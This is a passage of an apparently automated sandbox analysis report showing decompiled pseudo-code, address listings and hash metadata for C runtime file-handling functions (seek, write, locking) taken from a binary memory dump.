                                                                        								if( *_t103 == 0xa) {
                                                                        									_v16 = _v16 + 1;
                                                                        									_t87 = 0;
                                                                        									__eflags = 0;
                                                                        								}
                                                                        								_t103 = _t103 + 1;
                                                                        								__eflags = _t103 - _t115;
                                                                        							} while (_t103 < _t115);
                                                                        							goto L15;
                                                                        						}
                                                                        						return _t71 -  *(_t104 + 4);
                                                                        					}
                                                                        				}
                                                                        				_t86 = E0040BFC1(_t121);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				 *_t86 = 0x16;
                                                                        				_t71 = E0040E744(__edx, _t104, __esi);
                                                                        				goto L2;
                                                                        			}






























                                                                        0x0040c748
                                                                        0x0040c748
                                                                        0x0040c752
                                                                        0x0040c755
                                                                        0x0040c757
                                                                        0x0040c759
                                                                        0x0040c77c
                                                                        0x0040c781
                                                                        0x0040c785
                                                                        0x0040c788
                                                                        0x0040c78a
                                                                        0x0040c78a
                                                                        0x0040c78d
                                                                        0x0040c78f
                                                                        0x0040c790
                                                                        0x0040c791
                                                                        0x0040c799
                                                                        0x0040c79b
                                                                        0x0040c79e
                                                                        0x0040c773
                                                                        0x00000000
                                                                        0x0040c7a0
                                                                        0x0040c7a0
                                                                        0x0040c7a3
                                                                        0x0040c7a9
                                                                        0x0040c7b3
                                                                        0x0040c7b5
                                                                        0x0040c7b8
                                                                        0x0040c7bd
                                                                        0x0040c7c0
                                                                        0x0040c7c3
                                                                        0x0040c806
                                                                        0x0040c808
                                                                        0x0040c7f9
                                                                        0x0040c7f9
                                                                        0x0040c7fc
                                                                        0x0040c81a
                                                                        0x0040c81e
                                                                        0x0040c8d8
                                                                        0x0040c8de
                                                                        0x0040c8de
                                                                        0x0040c8e0
                                                                        0x00000000
                                                                        0x0040c8e0
                                                                        0x0040c824
                                                                        0x0040c827
                                                                        0x0040c829
                                                                        0x0040c843
                                                                        0x0040c84a
                                                                        0x0040c84f
                                                                        0x0040c852
                                                                        0x0040c857
                                                                        0x0040c8d2
                                                                        0x0040c8d5
                                                                        0x0040c8d5
                                                                        0x0040c8d5
                                                                        0x00000000
                                                                        0x0040c8d5
                                                                        0x0040c859
                                                                        0x0040c85b
                                                                        0x0040c85d
                                                                        0x0040c868
                                                                        0x0040c86b
                                                                        0x0040c88d
                                                                        0x0040c88f
                                                                        0x0040c892
                                                                        0x0040c895
                                                                        0x0040c89d
                                                                        0x0040c89f
                                                                        0x0040c8a6
                                                                        0x0040c8ab
                                                                        0x0040c8ae
                                                                        0x0040c8c0
                                                                        0x0040c8c0
                                                                        0x0040c8c3
                                                                        0x0040c8c3
                                                                        0x0040c8c8
                                                                        0x0040c8cd
                                                                        0x0040c8cd
                                                                        0x0040c8cf
                                                                        0x0040c8cf
                                                                        0x0040c8cf
                                                                        0x0040c8cf
                                                                        0x00000000
                                                                        0x0040c8cd
                                                                        0x0040c8b0
                                                                        0x0040c8b3
                                                                        0x0040c8b6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c8b8
                                                                        0x0040c8be
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c8be
                                                                        0x0040c8a1
                                                                        0x0040c8a1
                                                                        0x00000000
                                                                        0x0040c8a1
                                                                        0x0040c86d
                                                                        0x0040c873
                                                                        0x0040c880
                                                                        0x0040c880
                                                                        0x0040c882
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c877
                                                                        0x0040c87a
                                                                        0x0040c87c
                                                                        0x0040c87c
                                                                        0x0040c87c
                                                                        0x0040c87c
                                                                        0x0040c87f
                                                                        0x0040c87f
                                                                        0x0040c87f
                                                                        0x0040c884
                                                                        0x00000000
                                                                        0x0040c884
                                                                        0x0040c82b
                                                                        0x00000000
                                                                        0x0040c82b
                                                                        0x0040c7fe
                                                                        0x00000000
                                                                        0x0040c7fe
                                                                        0x0040c80a
                                                                        0x0040c80f
                                                                        0x00000000
                                                                        0x0040c80f
                                                                        0x0040c7ce
                                                                        0x0040c7d8
                                                                        0x0040c7db
                                                                        0x0040c7e0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c7e2
                                                                        0x0040c7e4
                                                                        0x0040c7e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040c7e8
                                                                        0x0040c7ea
                                                                        0x0040c7ea
                                                                        0x0040c7ed
                                                                        0x0040c7ef
                                                                        0x0040c7f2
                                                                        0x0040c7f2
                                                                        0x0040c7f2
                                                                        0x0040c7f4
                                                                        0x0040c7f5
                                                                        0x0040c7f5
                                                                        0x00000000
                                                                        0x0040c7ea
                                                                        0x00000000
                                                                        0x0040c7ab
                                                                        0x0040c79e
                                                                        0x0040c75b
                                                                        0x0040c760
                                                                        0x0040c761
                                                                        0x0040c762
                                                                        0x0040c763
                                                                        0x0040c764
                                                                        0x0040c765
                                                                        0x0040c76b
                                                                        0x00000000

                                                                        APIs
                                                                        • __fileno.LIBCMT ref: 0040C77C
                                                                        • __locking.LIBCMT ref: 0040C791
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                        • String ID:
                                                                        • API String ID: 2395185920-0
                                                                        • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                        • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                        • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                        • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t30;
                                                                        				signed int _t31;
                                                                        				signed int _t32;
                                                                        				signed int _t33;
                                                                        				signed int _t35;
                                                                        				signed int _t39;
                                                                        				void* _t42;
                                                                        				intOrPtr _t43;
                                                                        				void* _t45;
                                                                        				signed int _t48;
                                                                        				signed int* _t53;
                                                                        				void* _t54;
                                                                        				void* _t55;
                                                                        				void* _t57;
                                                                        
                                                                        				_t54 = __ebp;
                                                                        				_t45 = __edx;
                                                                        				_t42 = __ebx;
                                                                        				_t53 = _a4;
                                                                        				if(_t53 == 0) {
                                                                        					L40:
                                                                        					_t31 = _t30 | 0xffffffff;
                                                                        					__eflags = _t31;
                                                                        					return _t31;
                                                                        				} else {
                                                                        					_t43 = _a12;
                                                                        					if(_t43 == 2) {
                                                                        						goto L40;
                                                                        					} else {
                                                                        						_t30 = _t53[0xe];
                                                                        						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                        							goto L40;
                                                                        						} else {
                                                                        							_t48 = _a8;
                                                                        							if(_t53[0x17] != 0x77) {
                                                                        								__eflags = _t43 - 1;
                                                                        								if(_t43 == 1) {
                                                                        									_t48 = _t48 + _t53[0x1a];
                                                                        									__eflags = _t48;
                                                                        								}
                                                                        								__eflags = _t48;
                                                                        								if(_t48 < 0) {
                                                                        									goto L39;
                                                                        								} else {
                                                                        									__eflags = _t53[0x16];
                                                                        									if(__eflags == 0) {
                                                                        										_t33 = _t53[0x1a];
                                                                        										__eflags = _t48 - _t33;
                                                                        										if(_t48 < _t33) {
                                                                        											_t30 = E004054F0(_t42, _t54, _t53);
                                                                        											_t55 = _t55 + 4;
                                                                        											__eflags = _t30;
                                                                        											if(_t30 < 0) {
                                                                        												goto L39;
                                                                        											} else {
                                                                        												goto L27;
                                                                        											}
                                                                        										} else {
                                                                        											_t48 = _t48 - _t33;
                                                                        											L27:
                                                                        											__eflags = _t48;
                                                                        											if(_t48 == 0) {
                                                                        												L38:
                                                                        												return _t53[0x1a];
                                                                        											} else {
                                                                        												__eflags = _t53[0x12];
                                                                        												if(_t53[0x12] != 0) {
                                                                        													L30:
                                                                        													__eflags = _t53[0x1b] - 0xffffffff;
                                                                        													if(_t53[0x1b] != 0xffffffff) {
                                                                        														_t53[0x1a] = _t53[0x1a] + 1;
                                                                        														_t48 = _t48 - 1;
                                                                        														__eflags = _t53[0x1c];
                                                                        														_t53[0x1b] = 0xffffffff;
                                                                        														if(_t53[0x1c] != 0) {
                                                                        															_t53[0xe] = 1;
                                                                        														}
                                                                        													}
                                                                        													__eflags = _t48;
                                                                        													if(_t48 <= 0) {
                                                                        														goto L38;
                                                                        													} else {
                                                                        														while(1) {
                                                                        															_t35 = 0x4000;
                                                                        															__eflags = _t48 - 0x4000;
                                                                        															if(_t48 < 0x4000) {
                                                                        																_t35 = _t48;
                                                                        															}
                                                                        															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                        															_t55 = _t55 + 0xc;
                                                                        															__eflags = _t30;
                                                                        															if(_t30 <= 0) {
                                                                        																goto L39;
                                                                        															}
                                                                        															_t48 = _t48 - _t30;
                                                                        															__eflags = _t48;
                                                                        															if(_t48 > 0) {
                                                                        																continue;
                                                                        															} else {
                                                                        																goto L38;
                                                                        															}
                                                                        															goto L41;
                                                                        														}
                                                                        														goto L39;
                                                                        													}
                                                                        												} else {
                                                                        													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                        													_t55 = _t55 + 4;
                                                                        													_t53[0x12] = _t30;
                                                                        													__eflags = _t30;
                                                                        													if(_t30 == 0) {
                                                                        														goto L39;
                                                                        													} else {
                                                                        														goto L30;
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_push(0);
                                                                        										_push(_t48);
                                                                        										_push(_t53[0x10]);
                                                                        										_t53[0x1b] = 0xffffffff;
                                                                        										_t53[1] = 0;
                                                                        										 *_t53 = _t53[0x11];
                                                                        										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                        										__eflags = _t30;
                                                                        										if(_t30 < 0) {
                                                                        											goto L39;
                                                                        										} else {
                                                                        											_t53[0x1a] = _t48;
                                                                        											_t53[0x19] = _t48;
                                                                        											return _t48;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								if(_t43 == 0) {
                                                                        									_t48 = _t48 - _t53[0x19];
                                                                        								}
                                                                        								if(_t48 < 0) {
                                                                        									L39:
                                                                        									_t32 = _t30 | 0xffffffff;
                                                                        									__eflags = _t32;
                                                                        									return _t32;
                                                                        								} else {
                                                                        									if(_t53[0x11] != 0) {
                                                                        										L11:
                                                                        										if(_t48 <= 0) {
                                                                        											L17:
                                                                        											return _t53[0x19];
                                                                        										} else {
                                                                        											while(1) {
                                                                        												_t39 = 0x4000;
                                                                        												if(_t48 < 0x4000) {
                                                                        													_t39 = _t48;
                                                                        												}
                                                                        												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                        												_t55 = _t55 + 0xc;
                                                                        												if(_t30 == 0) {
                                                                        													goto L39;
                                                                        												}
                                                                        												_t48 = _t48 - _t30;
                                                                        												if(_t48 > 0) {
                                                                        													continue;
                                                                        												} else {
                                                                        													goto L17;
                                                                        												}
                                                                        												goto L41;
                                                                        											}
                                                                        											goto L39;
                                                                        										}
                                                                        									} else {
                                                                        										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                        										_t57 = _t55 + 4;
                                                                        										_t53[0x11] = _t30;
                                                                        										if(_t30 == 0) {
                                                                        											goto L39;
                                                                        										} else {
                                                                        											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                        											_t55 = _t57 + 0xc;
                                                                        											goto L11;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L41:
                                                                        			}



















                                                                        0x00405d00
                                                                        0x00405d00
                                                                        0x00405d00
                                                                        0x00405d01
                                                                        0x00405d07
                                                                        0x00405e7f
                                                                        0x00405e7f
                                                                        0x00405e7f
                                                                        0x00405e83
                                                                        0x00405d0d
                                                                        0x00405d0d
                                                                        0x00405d14
                                                                        0x00000000
                                                                        0x00405d1a
                                                                        0x00405d1a
                                                                        0x00405d20
                                                                        0x00000000
                                                                        0x00405d2f
                                                                        0x00405d34
                                                                        0x00405d38
                                                                        0x00405dad
                                                                        0x00405db0
                                                                        0x00405db2
                                                                        0x00405db2
                                                                        0x00405db2
                                                                        0x00405db5
                                                                        0x00405db7
                                                                        0x00000000
                                                                        0x00405dbd
                                                                        0x00405dbd
                                                                        0x00405dc1
                                                                        0x00405df8
                                                                        0x00405dfb
                                                                        0x00405dfd
                                                                        0x00405e04
                                                                        0x00405e09
                                                                        0x00405e0c
                                                                        0x00405e0e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405dff
                                                                        0x00405dff
                                                                        0x00405e10
                                                                        0x00405e10
                                                                        0x00405e12
                                                                        0x00405e73
                                                                        0x00405e78
                                                                        0x00405e14
                                                                        0x00405e14
                                                                        0x00405e18
                                                                        0x00405e2e
                                                                        0x00405e2e
                                                                        0x00405e32
                                                                        0x00405e34
                                                                        0x00405e37
                                                                        0x00405e38
                                                                        0x00405e3c
                                                                        0x00405e43
                                                                        0x00405e45
                                                                        0x00405e45
                                                                        0x00405e43
                                                                        0x00405e4c
                                                                        0x00405e4e
                                                                        0x00000000
                                                                        0x00405e50
                                                                        0x00405e50
                                                                        0x00405e50
                                                                        0x00405e55
                                                                        0x00405e57
                                                                        0x00405e59
                                                                        0x00405e59
                                                                        0x00405e61
                                                                        0x00405e66
                                                                        0x00405e69
                                                                        0x00405e6b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405e6d
                                                                        0x00405e6f
                                                                        0x00405e71
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405e71
                                                                        0x00000000
                                                                        0x00405e50
                                                                        0x00405e1a
                                                                        0x00405e1f
                                                                        0x00405e24
                                                                        0x00405e27
                                                                        0x00405e2a
                                                                        0x00405e2c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405e2c
                                                                        0x00405e18
                                                                        0x00405e12
                                                                        0x00405dc3
                                                                        0x00405dc9
                                                                        0x00405dcb
                                                                        0x00405dcc
                                                                        0x00405dcd
                                                                        0x00405dd4
                                                                        0x00405ddb
                                                                        0x00405ddd
                                                                        0x00405de5
                                                                        0x00405de7
                                                                        0x00000000
                                                                        0x00405ded
                                                                        0x00405ded
                                                                        0x00405df0
                                                                        0x00405df7
                                                                        0x00405df7
                                                                        0x00405de7
                                                                        0x00405dc1
                                                                        0x00405d3a
                                                                        0x00405d3c
                                                                        0x00405d3e
                                                                        0x00405d3e
                                                                        0x00405d43
                                                                        0x00405e79
                                                                        0x00405e7a
                                                                        0x00405e7a
                                                                        0x00405e7e
                                                                        0x00405d49
                                                                        0x00405d4d
                                                                        0x00405d77
                                                                        0x00405d79
                                                                        0x00405da7
                                                                        0x00405dac
                                                                        0x00405d7b
                                                                        0x00405d80
                                                                        0x00405d80
                                                                        0x00405d87
                                                                        0x00405d89
                                                                        0x00405d89
                                                                        0x00405d91
                                                                        0x00405d96
                                                                        0x00405d9b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405da1
                                                                        0x00405da5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405da5
                                                                        0x00000000
                                                                        0x00405d80
                                                                        0x00405d4f
                                                                        0x00405d54
                                                                        0x00405d59
                                                                        0x00405d5c
                                                                        0x00405d61
                                                                        0x00000000
                                                                        0x00405d67
                                                                        0x00405d6f
                                                                        0x00405d74
                                                                        0x00000000
                                                                        0x00405d74
                                                                        0x00405d61
                                                                        0x00405d4d
                                                                        0x00405d43
                                                                        0x00405d38
                                                                        0x00405d20
                                                                        0x00405d14
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _fseek_malloc_memset
                                                                        • String ID:
                                                                        • API String ID: 208892515-0
                                                                        • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                        • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                        • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                        • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t61;
                                                                        				signed int _t63;
                                                                        				void* _t68;
                                                                        				signed int _t69;
                                                                        				signed int _t72;
                                                                        				signed int _t74;
                                                                        				signed int _t75;
                                                                        				signed int _t77;
                                                                        				signed int _t78;
                                                                        				signed int _t81;
                                                                        				signed int _t82;
                                                                        				signed int _t84;
                                                                        				signed int _t88;
                                                                        				signed int _t97;
                                                                        				signed int _t98;
                                                                        				signed int _t99;
                                                                        				intOrPtr* _t100;
                                                                        				void* _t101;
                                                                        
                                                                        				_t90 = __edx;
                                                                        				if(_a8 == 0 || _a12 == 0) {
                                                                        					L4:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t100 = _a16;
                                                                        					_t105 = _t100;
                                                                        					if(_t100 != 0) {
                                                                        						_t82 = _a4;
                                                                        						__eflags = _t82;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t63 = _t59 | 0xffffffff;
                                                                        						_t90 = _t63 % _a8;
                                                                        						__eflags = _a12 - _t63 / _a8;
                                                                        						if(__eflags > 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t97 = _a8 * _a12;
                                                                        						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                        						_v8 = _t82;
                                                                        						_v16 = _t97;
                                                                        						_t81 = _t97;
                                                                        						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                        							_v12 = 0x1000;
                                                                        						} else {
                                                                        							_v12 =  *(_t100 + 0x18);
                                                                        						}
                                                                        						__eflags = _t97;
                                                                        						if(_t97 == 0) {
                                                                        							L32:
                                                                        							return _a12;
                                                                        						} else {
                                                                        							do {
                                                                        								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                        								__eflags = _t84;
                                                                        								if(_t84 == 0) {
                                                                        									L18:
                                                                        									__eflags = _t81 - _v12;
                                                                        									if(_t81 < _v12) {
                                                                        										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                        										__eflags = _t68 - 0xffffffff;
                                                                        										if(_t68 == 0xffffffff) {
                                                                        											L34:
                                                                        											_t69 = _t97;
                                                                        											L35:
                                                                        											return (_t69 - _t81) / _a8;
                                                                        										}
                                                                        										_v8 = _v8 + 1;
                                                                        										_t72 =  *(_t100 + 0x18);
                                                                        										_t81 = _t81 - 1;
                                                                        										_v12 = _t72;
                                                                        										__eflags = _t72;
                                                                        										if(_t72 <= 0) {
                                                                        											_v12 = 1;
                                                                        										}
                                                                        										goto L31;
                                                                        									}
                                                                        									__eflags = _t84;
                                                                        									if(_t84 == 0) {
                                                                        										L21:
                                                                        										__eflags = _v12;
                                                                        										_t98 = _t81;
                                                                        										if(_v12 != 0) {
                                                                        											_t75 = _t81;
                                                                        											_t90 = _t75 % _v12;
                                                                        											_t98 = _t98 - _t75 % _v12;
                                                                        											__eflags = _t98;
                                                                        										}
                                                                        										_push(_t98);
                                                                        										_push(_v8);
                                                                        										_push(E0040FA20(_t90, _t98, _t100));
                                                                        										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                        										_t101 = _t101 + 0xc;
                                                                        										__eflags = _t74 - 0xffffffff;
                                                                        										if(_t74 == 0xffffffff) {
                                                                        											L36:
                                                                        											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                        											_t69 = _v16;
                                                                        											goto L35;
                                                                        										} else {
                                                                        											_t88 = _t98;
                                                                        											__eflags = _t74 - _t98;
                                                                        											if(_t74 <= _t98) {
                                                                        												_t88 = _t74;
                                                                        											}
                                                                        											_v8 = _v8 + _t88;
                                                                        											_t81 = _t81 - _t88;
                                                                        											__eflags = _t74 - _t98;
                                                                        											if(_t74 < _t98) {
                                                                        												goto L36;
                                                                        											} else {
                                                                        												L27:
                                                                        												_t97 = _v16;
                                                                        												goto L31;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									_t77 = E0040C1FB(_t100);
                                                                        									__eflags = _t77;
                                                                        									if(_t77 != 0) {
                                                                        										goto L34;
                                                                        									}
                                                                        									goto L21;
                                                                        								}
                                                                        								_t78 =  *(_t100 + 4);
                                                                        								__eflags = _t78;
                                                                        								if(__eflags == 0) {
                                                                        									goto L18;
                                                                        								}
                                                                        								if(__eflags < 0) {
                                                                        									_t48 = _t100 + 0xc;
                                                                        									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                        									__eflags =  *_t48;
                                                                        									goto L34;
                                                                        								}
                                                                        								_t99 = _t81;
                                                                        								__eflags = _t81 - _t78;
                                                                        								if(_t81 >= _t78) {
                                                                        									_t99 = _t78;
                                                                        								}
                                                                        								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                        								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                        								 *_t100 =  *_t100 + _t99;
                                                                        								_t101 = _t101 + 0xc;
                                                                        								_t81 = _t81 - _t99;
                                                                        								_v8 = _v8 + _t99;
                                                                        								goto L27;
                                                                        								L31:
                                                                        								__eflags = _t81;
                                                                        							} while (_t81 != 0);
                                                                        							goto L32;
                                                                        						}
                                                                        					}
                                                                        					L3:
                                                                        					_t61 = E0040BFC1(_t105);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					 *_t61 = 0x16;
                                                                        					E0040E744(_t90, 0, _t100);
                                                                        					goto L4;
                                                                        				}
                                                                        			}





























                                                                        0x0040baaa
                                                                        0x0040baba
                                                                        0x0040bae0
                                                                        0x00000000
                                                                        0x0040bac1
                                                                        0x0040bac1
                                                                        0x0040bac4
                                                                        0x0040bac6
                                                                        0x0040bae7
                                                                        0x0040baea
                                                                        0x0040baec
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040baee
                                                                        0x0040baf3
                                                                        0x0040baf6
                                                                        0x0040baf9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bafe
                                                                        0x0040bb02
                                                                        0x0040bb09
                                                                        0x0040bb0c
                                                                        0x0040bb0f
                                                                        0x0040bb11
                                                                        0x0040bb1b
                                                                        0x0040bb13
                                                                        0x0040bb16
                                                                        0x0040bb16
                                                                        0x0040bb22
                                                                        0x0040bb24
                                                                        0x0040bbe9
                                                                        0x00000000
                                                                        0x0040bb2a
                                                                        0x0040bb2a
                                                                        0x0040bb2d
                                                                        0x0040bb2d
                                                                        0x0040bb33
                                                                        0x0040bb64
                                                                        0x0040bb64
                                                                        0x0040bb67
                                                                        0x0040bbc0
                                                                        0x0040bbc7
                                                                        0x0040bbca
                                                                        0x0040bbf5
                                                                        0x0040bbf5
                                                                        0x0040bbf7
                                                                        0x00000000
                                                                        0x0040bbfb
                                                                        0x0040bbcc
                                                                        0x0040bbcf
                                                                        0x0040bbd2
                                                                        0x0040bbd3
                                                                        0x0040bbd6
                                                                        0x0040bbd8
                                                                        0x0040bbda
                                                                        0x0040bbda
                                                                        0x00000000
                                                                        0x0040bbd8
                                                                        0x0040bb69
                                                                        0x0040bb6b
                                                                        0x0040bb78
                                                                        0x0040bb78
                                                                        0x0040bb7c
                                                                        0x0040bb7e
                                                                        0x0040bb82
                                                                        0x0040bb84
                                                                        0x0040bb87
                                                                        0x0040bb87
                                                                        0x0040bb87
                                                                        0x0040bb89
                                                                        0x0040bb8a
                                                                        0x0040bb94
                                                                        0x0040bb95
                                                                        0x0040bb9a
                                                                        0x0040bb9d
                                                                        0x0040bba0
                                                                        0x0040bc03
                                                                        0x0040bc03
                                                                        0x0040bc07
                                                                        0x00000000
                                                                        0x0040bba2
                                                                        0x0040bba2
                                                                        0x0040bba4
                                                                        0x0040bba6
                                                                        0x0040bba8
                                                                        0x0040bba8
                                                                        0x0040bbaa
                                                                        0x0040bbad
                                                                        0x0040bbaf
                                                                        0x0040bbb1
                                                                        0x00000000
                                                                        0x0040bbb3
                                                                        0x0040bbb3
                                                                        0x0040bbb3
                                                                        0x00000000
                                                                        0x0040bbb3
                                                                        0x0040bbb1
                                                                        0x0040bba0
                                                                        0x0040bb6e
                                                                        0x0040bb74
                                                                        0x0040bb76
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bb76
                                                                        0x0040bb35
                                                                        0x0040bb38
                                                                        0x0040bb3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bb3c
                                                                        0x0040bbf1
                                                                        0x0040bbf1
                                                                        0x0040bbf1
                                                                        0x00000000
                                                                        0x0040bbf1
                                                                        0x0040bb42
                                                                        0x0040bb44
                                                                        0x0040bb46
                                                                        0x0040bb48
                                                                        0x0040bb48
                                                                        0x0040bb50
                                                                        0x0040bb55
                                                                        0x0040bb58
                                                                        0x0040bb5a
                                                                        0x0040bb5d
                                                                        0x0040bb5f
                                                                        0x00000000
                                                                        0x0040bbe1
                                                                        0x0040bbe1
                                                                        0x0040bbe1
                                                                        0x00000000
                                                                        0x0040bb2a
                                                                        0x0040bb24
                                                                        0x0040bac8
                                                                        0x0040bac8
                                                                        0x0040bacd
                                                                        0x0040bace
                                                                        0x0040bacf
                                                                        0x0040bad0
                                                                        0x0040bad1
                                                                        0x0040bad2
                                                                        0x0040bad8
                                                                        0x00000000
                                                                        0x0040badd

                                                                        APIs
                                                                        • __flush.LIBCMT ref: 0040BB6E
                                                                        • __fileno.LIBCMT ref: 0040BB8E
                                                                        • __locking.LIBCMT ref: 0040BB95
                                                                        • __flsbuf.LIBCMT ref: 0040BBC0
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                        • String ID:
                                                                        • API String ID: 3240763771-0
                                                                        • Opcode ID: 5ae6f52eb953361433d7ea32021fe6e8a7002ad97f6d3a8caf392525720eb222
                                                                        • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                        • Opcode Fuzzy Hash: 5ae6f52eb953361433d7ea32021fe6e8a7002ad97f6d3a8caf392525720eb222
                                                                        • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				char _v8;
                                                                        				signed int _v12;
                                                                        				char _v20;
                                                                        				char _t43;
                                                                        				char _t46;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				int _t57;
                                                                        				int _t58;
                                                                        				signed short* _t59;
                                                                        				short* _t60;
                                                                        				int _t65;
                                                                        				char* _t72;
                                                                        
                                                                        				_t72 = _a8;
                                                                        				if(_t72 == 0 || _a12 == 0) {
                                                                        					L5:
